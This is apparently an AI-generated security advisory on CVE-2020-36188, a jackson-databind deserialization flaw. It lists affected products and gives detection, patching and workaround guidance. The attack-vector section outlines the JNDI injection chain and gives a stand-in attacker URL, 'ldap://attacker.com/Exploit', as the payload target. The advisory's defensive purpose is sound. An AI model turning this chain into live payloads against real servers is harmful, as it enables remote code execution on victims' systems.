CVE-2020-36188 Overview
CVE-2020-36188 is an insecure deserialization vulnerability affecting FasterXML jackson-databind 2.x versions before 2.9.10.8. The vulnerability stems from improper handling of the interaction between serialization gadgets and typing, specifically related to com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource. When polymorphic type handling is enabled, an attacker can craft malicious JSON input that triggers arbitrary code execution through JNDI lookup mechanisms.
Critical Impact
Remote attackers can achieve remote code execution by exploiting insecure deserialization through the JNDIConnectionSource gadget chain, potentially compromising enterprise systems running vulnerable jackson-databind versions.
Affected Products
- FasterXML jackson-databind 2.x before 2.9.10.8
- NetApp Cloud Backup and Service Level Manager
- Debian Linux 9.0
- Oracle Agile PLM, Application Testing Suite, and AutoVue for Agile PLM
- Oracle Banking products (Corporate Lending, Credit Facilities, Extensibility Workbench, Supply Chain Finance, Treasury Management, Virtual Account Management)
- Oracle Communications products (Billing and Revenue Management, Cloud Native Core, Diameter Signaling Route, Element Manager, and others)
- Oracle Commerce Platform, Data Integrator, Documaker, and GoldenGate Application Adapters
- Oracle Primavera Gateway and Unifier
- Oracle Retail products (Customer Management, Merchandising System, Service Backbone, XStore Point of Service)
- Oracle WebCenter Portal
Discovery Timeline
- 2021-01-06 - CVE-2020-36188 published to NVD
- 2024-11-21 - Last updated in NVD database
Technical Details for CVE-2020-36188
Vulnerability Analysis
This vulnerability is part of a series of jackson-databind deserialization issues that exploit unsafe polymorphic type handling. The core problem occurs when applications use jackson-databind with default typing enabled or with specific @JsonTypeInfo annotations that allow polymorphic deserialization. The com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource class acts as a "gadget" that can be leveraged during deserialization.
When an attacker supplies specially crafted JSON containing a reference to this gadget class, jackson-databind attempts to instantiate it during deserialization. The JNDIConnectionSource class performs JNDI lookups as part of its initialization, allowing attackers to trigger connections to attacker-controlled LDAP or RMI servers. This JNDI injection vector can ultimately lead to remote code execution through techniques like loading malicious Java classes from the attacker's server.
The vulnerability requires the target application to have polymorphic type handling enabled and the gadget class (com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource) available on the classpath. The network-based attack vector means no authentication is required, though exploitation complexity is higher due to the prerequisite conditions.
Root Cause
The root cause is CWE-502: Deserialization of Untrusted Data. Jackson-databind's polymorphic type handling feature allows JSON to specify the Java class to instantiate during deserialization. Without proper blocklist protections, attackers can specify dangerous "gadget" classes that perform harmful operations during construction or initialization. The JNDIConnectionSource gadget leverages Java's JNDI functionality to initiate outbound connections that can result in code execution.
Attack Vector
The attack exploits the network-accessible nature of applications processing JSON input with jackson-databind. An attacker sends a malicious JSON payload containing type information pointing to the JNDIConnectionSource class along with JNDI URL parameters. When the application deserializes this JSON:
- Jackson-databind instantiates the JNDIConnectionSource class based on the type hint
- During object construction, JNDIConnectionSource attempts to resolve the attacker-specified JNDI URL
- The JNDI lookup connects to an attacker-controlled server (LDAP/RMI)
- The malicious server responds with a reference to a remote Java class
- The victim's JVM loads and executes the attacker's malicious class
The attack payload typically embeds the gadget class name within JSON type properties such as @class or custom type identifiers, along with configuration properties that include the malicious JNDI URL (e.g., ldap://attacker.com/Exploit).
Detection Methods for CVE-2020-36188
Indicators of Compromise
- Outbound JNDI connections (LDAP on port 1389 or RMI on port 1099) to unexpected external IP addresses
- JSON payloads containing references to com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource
- Application logs showing deserialization errors mentioning JNDI-related classes
- Unexpected Java class loading activity or new class files appearing in application directories
- Network traffic patterns indicating LDAP/RMI connections following HTTP JSON requests
Detection Strategies
- Deploy web application firewall (WAF) rules to detect JSON payloads containing JNDIConnectionSource or similar gadget class names
- Monitor network traffic for outbound LDAP or RMI connections, especially to non-corporate destinations
- Implement application-level logging to capture deserialization activities and type resolution attempts
- Use Software Composition Analysis (SCA) tools to inventory jackson-databind versions across all applications
Monitoring Recommendations
- Configure SIEM rules to alert on JNDI-related patterns in application logs
- Monitor DNS queries for suspicious LDAP/RMI-style URIs that may indicate exploitation attempts
- Establish baseline network behavior and alert on anomalous outbound connections from Java applications
- Review application error logs for JsonMappingException or InvalidTypeIdException messages indicating blocked gadget classes
How to Mitigate CVE-2020-36188
Immediate Actions Required
- Upgrade FasterXML jackson-databind to version 2.9.10.8 or later (2.10.x, 2.11.x, 2.12.x recommended)
- Audit all applications for usage of polymorphic type handling features (enableDefaultTyping(), @JsonTypeInfo)
- Disable default typing unless absolutely required for application functionality
- Apply Oracle Critical Patch Updates for affected Oracle products
Patch Information
FasterXML has released jackson-databind version 2.9.10.8 which adds com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource to the blocklist of dangerous gadget classes. The fix prevents this specific class from being instantiated during polymorphic deserialization.
For comprehensive details on jackson-databind security considerations, refer to the Medium Blog on Jackson CVEs. Technical details about the specific issue are available in GitHub Issue #2996.
Oracle has addressed this vulnerability in multiple Critical Patch Updates including Oracle CPU April 2021, Oracle CPU July 2021, Oracle CPU October 2021, Oracle CPU January 2022, and Oracle CPU April 2022. NetApp has also issued Security Advisory NTAP-20210205-0005.
Workarounds
- If upgrading is not immediately possible, configure jackson-databind to use PolymorphicTypeValidator to restrict allowed types
- Implement strict input validation to reject JSON containing unexpected type identifiers
- Remove the New Relic agent dependencies from the classpath if not required, eliminating the gadget class
- Use network segmentation to restrict outbound LDAP/RMI connections from application servers
- Configure Java security manager policies to restrict JNDI lookups to approved directories
# Maven dependency update example
# Update pom.xml to use patched version:
# <dependency>
# <groupId>com.fasterxml.jackson.core</groupId>
# <artifactId>jackson-databind</artifactId>
# <version>2.9.10.8</version>
# </dependency>
# Verify current jackson-databind version in your project
mvn dependency:tree | grep jackson-databind
# Force update to patched version
mvn versions:use-latest-releases -Dincludes=com.fasterxml.jackson.core:jackson-databind
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
